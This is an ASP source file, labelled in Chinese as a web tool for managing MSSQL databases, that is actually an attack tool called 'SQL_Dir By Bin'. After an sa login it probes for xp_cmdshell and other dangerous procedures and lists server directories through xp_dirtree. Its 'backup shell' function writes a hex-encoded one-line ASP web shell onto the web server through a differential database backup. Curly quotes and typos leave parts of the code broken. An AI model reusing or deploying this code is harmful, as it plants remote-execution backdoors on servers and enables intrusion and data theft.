web操作mssql数据库asp源码
asp操作mssql数据库的源码:
<title>SQL_Dir By Bin</title>
<style id=theStyle>
BODY {
FONT-SIZE: 9pt;
COLOR: #000000;
background-color: #ffffff;
FONT-FAMILY: “Courier New”;
scrollbar-face-color:#E4E4F3;
scrollbar-highlight-color:#FFFFFF;
scrollbar-3dlight-color:#E4E4F3;
scrollbar-darkshadow-color:#9C9CD3;
scrollbar-shadow-color:#E4E4F3;
scrollbar-arrow-color:#4444B3;
scrollbar-track-color:#EFEFEF;
}
TABLE {
FONT-SIZE: 9pt;
FONT-FAMILY: “Courier New”;
BORDER-COLLAPSE: collapse;
border-width: 1px;
border-top-style: solid;
border-right-style: none;
border-bottom-style: none;
border-left-style: solid;
border-color: #d8d8f0;
}
.tr {
font-family: “Courier New”;
font-size: 9pt;
background-color: #e4e4f3;
text-align: center;
}
.td {
height: 24px;
font-size: 9pt;
background-color: #f9f9fd;
font-family: “Courier New”;
}
input {
font-family: “Courier New”;
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}
textarea {
font-family: “Courier New”;
BORDER-WIDTH: 1px;
FONT-SIZE: 12px;
color: #000000;
}
A:visited {
FONT-SIZE: 9pt;
COLOR: #333333;
FONT-FAMILY: “Courier New”;
TEXT-DECORATION: none;
}
A:active {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: “Courier New”;
TEXT-DECORATION: none;
}
A:link {
FONT-SIZE: 9pt;
COLOR: #000000;
FONT-FAMILY: “Courier New”;
TEXT-DECORATION: none;
}
A:hover {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: “Courier New”;
TEXT-DECORATION: none;
}
tr {
font-family: “Courier New”;
font-size: 9pt;
line-height: 18px;
}
td {
font-size: 9pt;
font-family: “Courier New”;
border-width: 1px;
border-top-style: none;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: none;
border-color: #d8d8f0;
}
.trHead {
font-family: “Courier New”;
height: 2px;
background-color: #e4e4f3;
line-height: 2px;
}
.fixSpan {
overflow: hidden;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
}
.fixTable {
word-break: break-all;
word-wrap: break-word;
}
#fileList span{
width: 120px;
line-height: 23px;
cursor: hand;
overflow: hidden;
padding-left: 5px;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
border: 1px solid #ffffff;
}
</style>
<%if session(“login”)=”" then%>
<%
Echo “<body onload=document.formx.pass.focus();>”
Echo “<table width=816 align=center>”
Echo “<form method=post name=formx action=’?action=login’>”
Echo “<tr>”
Echo “<td align=center class=td>数 据 库 连 接</td>”
Echo “</tr>”
Echo “<tr>”
Echo “<td height=75 align=center>”
Echo “IP:<input name=ip type=text style=’border:1px solid #d8d8f0;background-color:#ffffff;’ value=localhost> ”
Echo “PORT:<input name=port type=text style=’border:1px solid #d8d8f0;background-color:#ffffff;’ value=1433> ”
Echo “USER:<input name=user type=text style=’border:1px solid #d8d8f0;background-color:#ffffff;’ value=sa> ”
Echo “PASS:<input name=pass type=text style=’border:1px solid #d8d8f0;background-color:#ffffff;’> ”
Echo “</td>”
Echo “</tr>”
Echo “<tr>”
Echo “<td align=center class=td><input type=submit value=LOGIN style=’border:1px solid #d8d8f0;background-color:#f9f9fd;’></td>”
Echo “</tr>”
Echo “<tr>”
Echo “<td align=center class=td>2007 @ SQL_DIR By Bin <br><a href= http://www.rootkit.net.cn target=_blank>www.rootkit.net.cn</a></td>”
Echo “</tr>”
Echo “</form>”
Echo “</table>”
Echo “</body>”
%>
<%End If %>
<%
If request(“action”)=”login” Then
SqlLocalName =”"&request.Form(“ip”)&”,”&request.Form(“port”)&”" ‘连接IP [ 本地用 (local) 外地用IP ]
SqlUserName =”"&request.Form(“user”)&”" ‘用户名
SqlPassword =”"&request.Form(“pass”)&”" ‘用户密码
‘SqlDatabaseName=”sql” ‘数据库名
ConnStr = “Provider=Sqloledb;User ID=” & SqlUserName & “; Password=” & SqlPassword & “; Initial CataLog = ” & SqlDatabaseName & “; Data Source=” & SqlLocalName & “;”
SqlNowString=”GetDate()”
On Error Resume Next ‘ 容错
Set Conn=Server.CreateObject(“ADODB.Connection”)
Conn.open ConnStr
If Err.number=-2147467259 Then
Echo “<script language=’javascript’> alert(‘主机IP或者端口连接错误,请检查!’);history.back(); </script>”
ElseIf Err.number=-2147217843 Then
Echo “<script language=’javascript’> alert(‘用户名或者密码错误,请检查!’);history.back(); </script>”
End If
If Err.number=0 Then
session(“login”)=”yes”
session(“user”)=request.Form(“user”)
session(“pass”)=request.Form(“pass”)
session(“ip”)=request.Form(“ip”)
session(“port”)=request.Form(“port”)
End If
response.redirect”?action=tools”
End If
%>
<%
If request(“action”)=”tools” or request(“action”)=”" Then
If session(“login”)=”yes” Then
%>
<%
rem—————————-数据库连接—————–
ConnStr = “Provider=Sqloledb.1;User ID=” &session(“user”)& “; Password=” &session(“pass”)& “; Initial CataLog = ” & SqlDatabaseName & “; Data Source=” & session(“ip”) & “,”&session(“port”)&”;”
Set Conn=Server.CreateObject(“ADODB.Connection”)
Conn.open ConnStr
Set Cat = Server.CreateObject(“ADOX.Catalog”)
Cat.ActiveConnection = conn.ConnectionString
rem————————函数————-
Sub Echo(sStr)
Response.Write sStr
End Sub
Function IIf(var, val1, val2)
If var = True Then IIf = val1 Else IIf = val2
End Function
const copyright = “Code By Bin<br><a href = http://www.rootkit.net.cn target=_blank>www.rootkit.net.cn</a>”
RootPath = Server.MapPath(“/”)
Path=Request.ServerVariables(“PATH_TRANSLATED”)
Server_Name=Request.ServerVariables(“SERVER_NAME”)
IP=Request.ServerVariables(“LOCAL_ADDR”)
PORT=Request.ServerVariables(“SERVER_PORT”)
OS= Request.ServerVariables(“OS”)
OS= IIf(OS = “”, “Windows2003″, OS) & “, ” & Request.ServerVariables(“SERVER_SOFTWARE”)
OS= OS & “, ” & ScriptEngine & “/” & ScriptEngineMajorVersion & “.” &ScriptEngineMinorVersion & “.” & ScriptEngineBuildVersion
Curl=Request.ServerVariables(“SCRIPT_NAME”)
RequestUrl=Request.ServerVariables(“Url”)
URL=”http://“&Server_Name&Requesturl
rem————————————–
rem———————–数据库操作——————–
Set rs = conn.execute(“select @@version”)
SQLversion=rs(0)
Set rs = Conn.execute(“select db_name(0)”)
DBname=rs(0)
Set rs = Conn.execute(“select user”)
DBuser=rs(0)
‘权限判断
Set rs = Conn.execute(“Select IS_SRVROLEMEMBER(’sysadmin’)”)
If rs(0)=1 Then
dbo=”sa”
End If
Set rs = Conn.execute(“Select IS_MEMBER(‘db_owner’)”)
If rs(0)=1 Then
dbo=”db_owner”
Else
dbo=”public”
End If
‘扩展判断
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_cmdshell’”)
If rs(0)=1 Then
xp_cmdshell=”XP_cmdshell √”
Else
xp_cmdshell=”XP_cmdshell ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’sp_oacreate’”)
If rs(0)=1 Then
sp_oacreate=”SP_oacreate √”
Else
sp_oacreate=”SP_oacreate ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_regwrite’”)
If rs(0)=1 Then
xp_regwrite=”XP_regwrite √”
Else
xp_regwrite=”XP_regwrite ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_servicecontrol’”)
If rs(0)=1 Then
xp_servicecontrol=”XP_servicecontrol √”
Else
xp_servicecontrol=”XP_servicecontrol ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_regread’”)
If rs(0)=1 Then
xp_regread=”XP_regread √”
Else
xp_regread=”XP_regread ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’sp_oamethod’”)
If rs(0)=1 Then
sp_oamethod=”SP_oamethod √”
Else
sp_oamethod=”SP_oamethod ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’XP_dirtree’”)
If rs(0)=1 Then
XP_dirtree=”XP_dirtree √”
Else
XP_dirtree=”XP_dirtree × (貌似不能使用该程序)”
End If
rem——————–操作检测——————-
On Error Resume Next
Set Rs = Conn.Execute(“USE pubs”)
If Err Then
cbase=”无法切换到PUBS数据库!”
Else
cbase=”切换到PUBS数据库!”
End If
Set rs = Conn.execute(“drop table [bin_dir]“)
If Err Then
drop=”删除表失败!”
Else
drop=”删除表成功!”
End If
Set rs = Conn.execute(“Create TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) Insert bin_dir EXEC MASTER..XP_dirtree ‘c:’,1,1″)
If Err Then
create=”建表失败!”
Else
create=”建表成功!”
End If
Set rs = Conn.execute(“select conunt(*) from bin_dir”)
If rs(0)>1 Then
xp=”扩展执行成功! <FONT COLOR=RED><STRONG>GOOD LUCK!</STRONG></FONT>”
Else
xp=”扩展执行失败! SOORY!”
End If
rem————————————————–
Sub SQLdbname()
l=100
For i=1 To l
a=a+1
Set rs = conn.execute(“select db_name(“&a&”)”)
If rs(0)<>”" then
Echo “”&rs(0)&” ”
Else
Exit For
End If
Next
End Sub
rem———————————–数据显示———————
Sub showdata()
set rs2=server.CreateObject(“adodb.recordset”)
rs2.open “select * from bin_dir order by dirfile”,conn,1,1
Echo “<tr>”
For j = 0 To rs2.Fields.Count – 1
Echo “<td height=22 class=td width=500><span class=fixSpan title=’” & rs2.Fields(j).Name & “‘ style=’width:125px;padding-left:5px;’>” & rs2.Fields(j).Name & “</span></td>”
Next
Echo “</tr>”
Echo “<tr>”
For i = 0 To rs2.recordcount
For j = 0 To rs2.Fields.Count – 1
Echo “<td height=22 class=td width=500><span class=fixSpan style=’width:250px;padding-left:5px;’><a href=’?action=dir&path=”&dir_path&”"&rs2(j)&”‘>” &rs2(j)& “</a></span></td>”
Next
Echo “<tr>”
RS2.MoveNext
Next
End Sub
rem—————————————————–
rem———————————–删除表———————
Sub droptable()
Set rs = Conn.execute(“drop table [bin_dir]“)
End Sub
rem—————————————————–
Echo “<table style=’TABLE-LAYOUT: fixed; WORD-BREAK: break-all’>”
Echo “<tr>”
Echo”<td width=20% valign=top>”
For Each objTable In Cat.Tables
Echo “<span class=fixSpan title=’” & objTable.Name & “‘ ”
Echo “style=’width:90%;padding-left:8px;cursor:hand;’>” & objTable.Name & “</span>”
Next
Echo “</td>”
Echo “<td valign=top>”
Echo “<table>”
Echo “<tr class=td>”
Echo “<td width=’100′> 项目</td>”
Echo “<td width=’400′> 值</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 当前时间</td>”
Echo “<td> “&FormatDateTime(Now(), 0)&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 服务器地址</td>”
Echo “<td> 名称: “&SERVER_NAME&”(IP:”&IP&”) 端口:”&PORT&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 软件环境</td>”
Echo “<td> “&OS&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 站点目录</td>”
Echo “<td> “&rootpath&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 当前路径</td>”
Echo “<td> Path: ” &path& “<br /> URL : “&URL&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> SQL版本</td>”
Echo “<td> “&sqlversion&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> SQL所有库</td>”
Echo “<td> ”
sqldbname()
Echo “</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 当前库检测</td>”
Echo “<td> 用户名:”&dbname&” 数据库:”&dbuser&” 权限:”&dbo&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 扩展检测</td>”
Echo “<td> “&xp_cmdshell&” “&sp_oacreate&” “&xp_regwrite&” “&xp_servicecontrol&” “&sp_oamethod&”<br> “&xp_regread&” “&XP_dirtree&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 操作检测</td>”
Echo “<td> “&cbase&” “&create&” “&drop&” “&xp&”</td>”
Echo “</tr>”
Echo “</table>”
Echo “<table>”
Echo “<tr class=td>”
Echo “<td width=’115′> 列目录</td>”
Echo “<form method=post name=form2 action=’?action=dir’>”
Echo “<td width=’700′> <INPUT TYPE=text NAME=path size=70 value=’c:’> <INPUT TYPE=submit value=查询></from></td>”
Echo “</form>”
Echo “</tr>”
Echo “</table>”
Echo “</td>”
Echo “</tr>”
Echo “</table>”
Echo “<p>”
Echo “<center>”?right&”</center>”
End If
End If ‘tools功能结束%>
<%
If request(“action”)=”dir” Then
If session(“login”)=”yes” Then
On Error Resume Next
rem—————————-数据库连接—————–
ConnStr = “Provider=Sqloledb.1;User ID=” &session(“user”)& “; Password=” &session(“pass”)& “; Initial CataLog = ” & SqlDatabaseName & “; Data Source=” & session(“ip”) & “,”&session(“port”)&”;”
Set Conn=Server.CreateObject(“ADODB.Connection”)
Conn.open ConnStr
Set Cat = Server.CreateObject(“ADOX.Catalog”)
Cat.ActiveConnection = conn.ConnectionString
rem————————函数————-
rem——————–操作检测——————-
On Error Resume Next
bak_path=Replace(Request(“bak”),”\”,”")
dir_path=Replace(Request(“path”),”\”,”")
If bak_path<>”" Then
dir_path=Replace(bak_path,”bin.asp”,”")
Set Rs = Conn.Execute(“create table [bin_cmd] ([cmd] [image])”)
Set Rs = Conn.Execute(“declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X620069006E00 backup database @a to disk = @s;”)
Set Rs = Conn.Execute(“insert into [bin_cmd](cmd) values(0×3C25657865637574652872657175657374282242222929253E);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=’”&bak_path&”‘ backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT”)
Set Rs = Conn.Execute(“drop table [bin_cmd]“)
end if
Set Rs = Conn.Execute(“USE pubs”)
If Err Then
cbase=”无法切换到PUBS数据库!”
Else
cbase=”切换到PUBS数据库!”
End If
Set rs = Conn.execute(“drop table [bin_dir]“)
If Err Then
drop=”删除表失败!”
Else
drop=”删除表成功!”
End If
Set rs = Conn.execute(“Create TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) Insert bin_dir EXEC MASTER..XP_dirtree ‘”&dir_path&”‘,1,1″)
If Err Then
create=”建表失败!”
Else
create=”建表成功!”
End If
Set rs = Conn.execute(“select conunt(*) from bin_dir”)
If rs(0)>1 Then
xp=”扩展执行成功! <FONT COLOR=RED><STRONG>GOOD LUCK!</STRONG></FONT>”
Else
xp=”扩展执行失败! SOORY!”
End If
rem——————
Echo “<table style=’TABLE-LAYOUT: fixed; WORD-BREAK: break-all’>”
Echo “<tr>”
Echo”<td width=20% valign=top>”
For Each objTable In Cat.Tables
Echo “<span class=fixSpan title=’” & objTable.Name & “‘ ”
Echo “style=’width:90%;padding-left:8px;cursor:hand;’>” & objTable.Name & “</span>”
Next
Echo “</td>”
Echo “<td valign=top>”
Echo “<table>”
Echo “<tr class=td>”
Echo “<td width=’103′> 操作检测</td>”
Echo “<td width=’700′> “&cbase&” “&create&” “&drop&” “&xp&”</td>”
Echo “</tr>”
Echo “</table>”
Echo “<table>”
Echo “<tr class=td>”
Echo “<td width=’115′> 备份SHELL</td>”
Echo “<form method=post name=formt action=’?action=dir’>”
Echo “<td width=’700′> <INPUT TYPE=text NAME=bak size=70 value=’”&dir_path&”bin.asp’> <INPUT TYPE=submit value=备份></td></form>”
Echo “</tr>”
Echo “</table>”
Echo “<table>”
Echo “<tr class=td>”
Echo “<td width=’121′> 列目录</td>”
Echo “<form method=post name=form2 action=’?action=dir’>”
Echo “<td width=’700′> <INPUT TYPE=text NAME=path size=70 value=’”&dir_path&”‘> <INPUT TYPE=submit value=查询><input type = button value=退出 onclick= location.href(‘?action=logout’)></td></form>”
Echo “</tr>”
Echo “</table>”
Echo “<table>”
showdata()
Echo “</table>”
Echo “</td>”
Echo “</tr>”
Echo “</table>”
Echo “<p>”
Echo “<center>”?right&”</center>”
End If
End If
%>
<% If Request(“action”)=”logout” Then
Session(“login”) = “”
Response.Redirect”?action=login”
end if
%>
